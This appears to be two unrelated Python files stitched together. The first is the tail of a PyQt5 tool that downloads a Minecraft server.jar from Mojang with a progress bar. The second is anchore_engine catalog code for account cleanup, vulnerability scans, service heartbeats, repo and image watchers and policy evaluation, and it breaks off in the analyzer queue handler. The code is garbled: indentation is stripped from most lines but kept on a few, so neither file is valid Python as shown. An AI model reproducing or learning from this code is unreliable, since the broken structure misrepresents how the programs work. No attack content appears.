)
self.browser = QWebEngineView()
self.browser.load(QUrl(URL))
self.browser.resize(800,600)
self.browser.move(200,200)
self.browser.setWindowTitle('Minecraft')
self.progressBar = PyQt5.QtWidgets.QProgressBar(self)
grid = PyQt5.QtWidgets.QGridLayout()
grid.addWidget(self.browser,2, 0, 5, 15)
grid.addWidget(self.progressBar)
self.setLayout(grid)
self.resize(1200, 800)
self.center()
self.setWindowTitle('Minecraft')
self.show()
def center(self):
        '''Center the widget on the screen's available geometry.'''
qr = self.frameGeometry()
cp = PyQt5.QtWidgets.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
@PyQt5.QtCore.pyqtSlot("QWebEngineDownloadItem*")
def on_downloadRequested(self,download):
self.old_path = download.url().path() # download.path()
#self.thread = threading.Thread(target=self.download)
#self.thread.setDaemon(True)
#self.thread.start()
#self.thread.join()
self.download()
def check(self, block_count, block_size, total_size):
        if total_size > 0:
            percentage = 100.0 * block_count * block_size / total_size
            self.progressBar.setValue(int(min(percentage, 100)))
PyQt5.QtWidgets.QApplication.processEvents()
def download(self):
if not os.path.isdir('./ServerData'):
os.mkdir('./ServerData')
if not os.path.isfile('./ServerData/server.jar'):
urllib.request.urlretrieve('https://launcher.mojang.com'+self.old_path,'./ServerData/server.jar',self.check) #'https://launcher.mojang.com'+self.old_path
#https://launcher.mojang.com/v1/objects/1b557e7b033b583cd9f66746b7a9ab1ec1673ced/server.jar
            subwindow().show('Download complete')
        else:
            subwindow().show('File already exists')
class subwindow(PyQt5.QtWidgets.QWidget):
    text = 'Done'
def __init__(self,parent = None):
super().__init__()
self.w = PyQt5.QtWidgets.QDialog(parent)
self.label = PyQt5.QtWidgets.QLabel()
self.label.setText(self.text)
        button = PyQt5.QtWidgets.QPushButton('Close', self.w)
button.clicked.connect(sys.exit)
layout = PyQt5.QtWidgets.QHBoxLayout()
layout.addWidget(self.label)
layout.addWidget(button)
self.w.setLayout(layout)
def show(self,text):
        self.label.setText(text)
self.w.exec_()
def run():
app = PyQt5.QtWidgets.QApplication(sys.argv)
ex = Downloader()
sys.exit(app.exec_())
if __name__ == '__main__':
# mainPyQt5()
app = PyQt5.QtWidgets.QApplication(sys.argv)
# setWindowIcon is a method for QApplication, not for QWidget
ex = Downloader()
sys.exit(app.exec_())
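# Illustrative sketch (not used by the GUI above): how a urllib.request reporthook such
# as Downloader.check maps its (block_count, block_size, total_size) arguments onto a
# 0-100 progress value. Printing is an assumption for this example; the class above
# feeds the value to a QProgressBar instead.
def example_reporthook(block_count, block_size, total_size):
    if total_size > 0:
        percentage = min(100, int(100.0 * block_count * block_size / total_size))
        print('downloaded {}%'.format(percentage))
# Usage sketch:
#   urllib.request.urlretrieve(url, 'server.jar', example_reporthook)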
|
__init__.py
|
import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
return_object = {}
httpcode = 500
resourcemaps = [
("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
]
limit = 2048
all_total = 0
all_deleted = 0
for resourcename,getfunc,delfunc in resourcemaps:
try:
deleted = 0
total = 0
with db.session_scope() as dbsession:
records = getfunc(userId, session=dbsession, limit=limit)
total = len(records)
for record in records:
delfunc(userId, record, dbsession, force=True)
deleted = deleted + 1
return_object['total_{}'.format(resourcename)] = total
return_object['total_{}_deleted'.format(resourcename)] = deleted
all_total = all_total + total
all_deleted = all_deleted + deleted
if total or deleted:
logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
except Exception as err:
logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
return_object['all_total'] = all_total
return_object['all_deleted'] = all_deleted
httpcode = 200
return return_object, httpcode
def handle_account_resource_cleanup(*args, **kwargs):
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
        # Iterate over all accounts in the "deleting" state and perform resource cleanup for
        # each one. Once no resources remain for the account id, delete the account record itself.
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
for account in accounts:
userId = account['name']
logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
try:
return_object, httpcode = do_user_resources_delete(userId)
logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
with db.session_scope() as session:
mgr = manager_factory.for_session(session)
mgr.delete_account(userId)
else:
logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
except Exception as err:
raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
except Exception as err:
logger.warn("failure in handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
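# Minimal sketch of the cleanup pattern used by handle_account_resource_cleanup above:
# keep deleting an account's resources each cycle and only drop the account record once
# a cycle reports nothing left. `delete_resources` and `delete_account` are assumed
# callables for this example only (the real code uses do_user_resources_delete and the
# identity manager).
def _sketch_cleanup_account(userId, delete_resources, delete_account):
    summary, _httpcode = delete_resources(userId)
    if summary.get('all_total', None) == 0 and summary.get('all_deleted', None) == 0:
        # nothing remained and nothing was deleted this cycle - safe to remove the account
        delete_account(userId)
        return True
    # resources still pending; try again on the next cycle
    return False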
def handle_vulnerability_scan(*args, **kwargs):
global feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
if not all_ready:
logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# vulnerability scans
doperform = False
vuln_subs = []
for subscription_type in ['vuln_update']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
vuln_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in vuln_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
current_imageDigest = image_records[0]['imageDigest']
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
doperform = True
if doperform:
logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
except Exception as err:
logger.warn("vulnerability scan failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in feed sync handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_service_watcher(*args, **kwargs):
# global latest_service_records
cycle_timer = kwargs['mythread']['cycle_timer']
max_service_heartbeat_timer = 300
max_service_orphaned_timer = 3600
max_service_cleanup_timer = 86400
while True:
logger.debug("FIRING: service watcher")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
anchore_services = db_services.get_all(session=dbsession)
# update the global latest service record dict in services.common
# latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
# fields to update each tick:
#
# heartbeat (current time)
# status (true/false)
# status_message (state of service)
# short_description(api return)
#
for service in anchore_services:
event = None
service_update_record = {}
if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
status = anchore_engine.subsys.servicestatus.get_status(service)
service_update_record.update({'heartbeat': int(time.time()), 'status': True,
'status_message': taskstate.complete_state('service_status'),
'short_description': json.dumps(status)})
else:
try:
try:
status = json.loads(service['short_description'])
except:
status = {'up': False, 'available': False}
# set to down until the response can be parsed
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status description"
try:
# NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
if status['up'] and status['available']:
if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_heartbeat_timer)
# Trigger an event to log the down service
event = events.ServiceDowned(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_heartbeat_timer))
else:
service_update_record['status'] = True
service_update_record['status_message'] = taskstate.complete_state('service_status')
try:
service_update_record['short_description'] = json.dumps(status)
except:
service_update_record['short_description'] = str(status)
else:
# handle the down state transitions
if time.time() - service['heartbeat'] > max_service_cleanup_timer:
# remove the service entirely
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
try:
# remove the service record from DB
removed_hostid = service['hostid']
removed_servicename = service['servicename']
removed_base_url = service['base_url']
db_services.delete(removed_hostid, removed_servicename, session=dbsession)
service_update_record = None
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceRemoved(user_id=event_account, name=removed_servicename,
host=removed_hostid,
url=removed_base_url,
cause='no heartbeat from service in ({}) seconds'.format(
max_service_cleanup_timer))
except Exception as err:
logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
# transition down service to orphaned
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.orphaned_state('service_status')
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_orphaned_timer)
if service['status_message'] != taskstate.orphaned_state('service_status'):
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceOrphaned(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_orphaned_timer))
except Exception as err:
logger.warn(
"could not get/parse service status record for service: - exception: " + str(err))
except Exception as err:
logger.warn(
"could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
err.__dict__))
if service_update_record:
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status"
finally:
if event:
catalog_impl.add_event(event, dbsession)
if service_update_record:
service.update(service_update_record)
try:
db_services.update_record(service, session=dbsession)
except Exception as err:
logger.warn("could not update DB: " + str(err))
logger.debug("FIRING DONE: service watcher")
try:
kwargs['mythread']['last_return'] = True
except:
pass
time.sleep(cycle_timer)
return True
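# Illustrative sketch of the heartbeat-age thresholds applied by handle_service_watcher
# above, collapsed into a single classifier. This is a simplification for illustration:
# the real loop also looks at the reported up/available flags and only transitions to
# 'orphaned'/'remove' for services that are already down. Threshold defaults mirror the
# values used above.
def _sketch_classify_service(heartbeat_age_seconds,
                             max_heartbeat=300,
                             max_orphaned=3600,
                             max_cleanup=86400):
    if heartbeat_age_seconds > max_cleanup:
        return 'remove'
    elif heartbeat_age_seconds > max_orphaned:
        return 'orphaned'
    elif heartbeat_age_seconds > max_heartbeat:
        return 'down'
    return 'up'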
def handle_repo_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
dbfilter = {}
with db.session_scope() as dbsession:
dbfilter['subscription_type'] = 'repo_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
event = None
try:
regrepo = subscription_record['subscription_key']
if subscription_record['subscription_value']:
subscription_value = json.loads(subscription_record['subscription_value'])
if 'autosubscribe' not in subscription_value:
subscription_value['autosubscribe'] = False
if 'lookuptag' not in subscription_value:
subscription_value['lookuptag'] = 'latest'
else:
subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
stored_repotags = subscription_value.get('repotags', [])
fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=False,
registry_creds=(None, None))
# List tags
try:
curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
except AnchoreException as e:
event = events.ListTagsFailed(user_id=userId, registry=image_info.get('registry', None),
repository=image_info.get('repo', None), error=e.to_dict())
raise e
autosubscribes = ['analysis_update']
if subscription_value['autosubscribe']:
autosubscribes.append("tag_update")
repotags = set(curr_repotags).difference(set(stored_repotags))
if repotags:
logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
added_repotags = stored_repotags
for repotag in repotags:
try:
fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
logger.debug("found new tag in repo: " + str(fulltag))
try:
new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
except Exception as err:
event = events.ImageRegistryLookupFailed(user_id=userId, image_pull_string=fulltag, data=err.__dict__)
raise err
manifest = None
try:
if 'manifest' in new_image_info:
try:
manifest = json.dumps(new_image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag,
manifest=new_image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFailed(user_id=userId, tag=fulltag, error=e.to_dict())
raise
with db.session_scope() as dbsession:
logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
# add the image
image_records = catalog_impl.add_or_update_image(dbsession, userId,
new_image_info['imageId'],
tags=[new_image_info['fulltag']],
digests=[new_image_info['fulldigest']],
parentdigest=new_image_info.get('parentdigest', None),
manifest=manifest)
# add the subscription records with the configured default activations
for stype in anchore_engine.common.subscription_types:
activate = False
if stype == 'repo_update':
continue
elif stype in autosubscribes:
activate = True
db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
session=dbsession)
added_repotags.append(repotag)
except Exception as err:
logger.warn(
"could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
err))
# update the subscription record with the latest successfully added image tags
with db.session_scope() as dbsession:
subscription_value['repotags'] = added_repotags
subscription_value['tagcount'] = len(added_repotags)
db_subscriptions.update(userId, regrepo, 'repo_update',
{'subscription_value': json.dumps(subscription_value)},
session=dbsession)
else:
logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
except Exception as err:
logger.warn("failed to process repo_update subscription - exception: " + str(err))
finally:
if event:
with db.session_scope() as dbsession:
catalog_impl.add_event(event, dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_image_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
with db.session_scope() as dbsession:
dbfilter = {}
dbfilter['subscription_type'] = 'tag_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
alltags = []
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
try:
fulltag = subscription_record['subscription_key']
if fulltag not in alltags:
alltags.append(fulltag)
except Exception as err:
logger.warn("problem creating taglist for image watcher - exception: " + str(err))
for registry_record in registry_creds:
try:
registry_status = docker_registry.ping_docker_registry(registry_record)
except Exception as err:
registry_record['record_state_key'] = 'auth_failure'
registry_record['record_state_val'] = str(int(time.time()))
logger.warn("registry ping failed - exception: " + str(err))
logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
for fulltag in alltags:
event = None
try:
logger.debug("checking image latest info from registry: " + fulltag)
try:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
except Exception as err:
event = events.ImageRegistryLookupFailed(user_id=userId, image_pull_string=fulltag, data=err.__dict__)
raise err
logger.spew("checking image: got registry info: " + str(image_info))
manifest = None
try:
if 'manifest' in image_info:
try:
manifest = json.dumps(image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFailed(user_id=userId, tag=fulltag, error=e.to_dict())
raise
parent_manifest = json.dumps(image_info.get('parentmanifest', {}))
try:
dbfilter = {
'registry': image_info['registry'],
'repo': image_info['repo'],
'tag': image_info['tag'],
'digest': image_info['digest']
}
except Exception as err:
raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
try:
stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
if not stored_manifest:
raise Exception("stored manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
try:
stored_parent_manifest = json.loads(obj_mgr.get_document(userId, 'parent_manifest_data', image_info['digest']))
if not stored_parent_manifest:
raise Exception("stored parent manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored parent manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'parent_manifest_data', image_info['digest'], parent_manifest)
logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
with db.session_scope() as dbsession:
record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
if record:
logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
else:
logger.info(
"checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
fulltag) + " latest_digest=" + str(dbfilter['digest']))
# get the set of existing digests
try:
last_dbfilter = {}
last_dbfilter.update(dbfilter)
last_dbfilter.pop('digest', None)
last_digests = []
last_annotations = {}
is_latest = True
with db.session_scope() as dbsession:
last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
session=dbsession)
if last_image_records:
for last_image_record in last_image_records:
imageDigest = last_image_record['imageDigest']
for image_detail in last_image_record['image_detail']:
last_digests.append(image_detail['digest'])
# only do this (bring forward annotations) for the first found digest (last digest associated with tag)
if is_latest:
if not last_annotations and last_image_record['annotations']:
try:
if last_image_record.get('annotations', '{}'):
last_annotations.update(
json.loads(last_image_record.get('annotations', '{}')))
except:
pass
is_latest = False
except Exception as err:
logger.error(str(err))
# add and store the new image
with db.session_scope() as dbsession:
logger.debug("adding new image from tag watcher " + str(image_info))
image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
tags=[image_info['fulltag']],
digests=[image_info['fulldigest']],
parentdigest=image_info.get('parentdigest', None),
manifest=manifest,
parent_manifest=parent_manifest,
annotations=last_annotations)
if image_records:
image_record = image_records[0]
else:
image_record = {}
logger.info("checking image: added new image: " + str(image_record))
new_digests = [image_info['digest']]
# construct the notification and queue
try:
npayload = {
'last_eval': last_digests,
'curr_eval': new_digests,
}
if last_annotations:
npayload['annotations'] = last_annotations
rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
logger.debug("queued image tag update notification: " + fulltag)
# inobj = {
# 'userId': userId,
# 'subscription_key':fulltag,
# 'notificationId': str(uuid.uuid4()),
# 'last_eval':last_digests,
# 'curr_eval':new_digests,
# }
# if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
# qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
# logger.debug("queued image tag update notification: " + fulltag)
except Exception as err:
logger.error("failed to queue tag update notification - exception: " + str(err))
raise err
except Exception as err:
logger.error("failed to check/update image - exception: " + str(err))
finally:
if event:
with db.session_scope() as dbsession:
catalog_impl.add_event(event, dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def check_feedmeta_update(dbsession):
global feed_sync_updated
return feed_sync_updated
def check_policybundle_update(userId, dbsession):
global bundle_user_last_updated
is_updated = True
try:
last_bundle_update = 0
active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
if active_policy_record:
last_bundle_update = active_policy_record['last_updated']
else:
logger.warn("user has no active policy - queueing just in case" + str(userId))
return is_updated
if userId not in bundle_user_last_updated:
bundle_user_last_updated[userId] = last_bundle_update
if last_bundle_update == bundle_user_last_updated[userId]:
logger.debug("no bundle update detected since last cycle")
is_updated = False
else:
logger.debug("bundle update detected since last cycle")
bundle_user_last_updated[userId] = last_bundle_update
is_updated = True
except Exception as err:
logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
bundle_user_last_updated[userId] = 0
is_updated = True
return is_updated
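# Minimal sketch of the change-detection idea in check_policybundle_update above:
# remember the last seen last_updated timestamp per user and report an update only when
# it changes. `_sketch_last_seen` is a stand-in for the bundle_user_last_updated cache
# and exists only for this example.
_sketch_last_seen = {}
def _sketch_bundle_updated(userId, last_bundle_update):
    previous = _sketch_last_seen.get(userId)
    _sketch_last_seen[userId] = last_bundle_update
    # first sighting or a changed timestamp both count as "updated"
    return previous is None or previous != last_bundle_update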
def handle_policyeval(*args, **kwargs):
global system_user_auth, bundle_user_is_updated, feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
feed_updated = check_feedmeta_update(dbsession)
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# policy evaluations
doperform = False
policy_subs = []
for subscription_type in ['policy_eval']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
policy_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in policy_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
# TODO - checks to avoid performing eval if nothing has changed
doperform = True
if doperform:
logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
evaltag=fulltag)
except Exception as err:
logger.warn("policy evaluation failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_analyzer_queue(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
localconfig = anchore_engine.configuration.localconfig.get_config()
obj_mgr = object_store.get_manager()
max_working_time = 36000
try:
max_working_time = int(localconfig['image_analyze_timeout_seconds'])
except:
max_working_time = 36000
fair_share_enabled = True
try:
if str(localconfig.get('services', {}).get('catalog', {}).get('fair_share_image_analysis_queueing', 'True')).lower() == 'false':
fair_share_enabled = False
except:
fair_share_enabled = True
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return True
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(include_service=False)
q_client = internal_client_for(SimpleQueueClient, userId=None)
queue_rebalance = {}
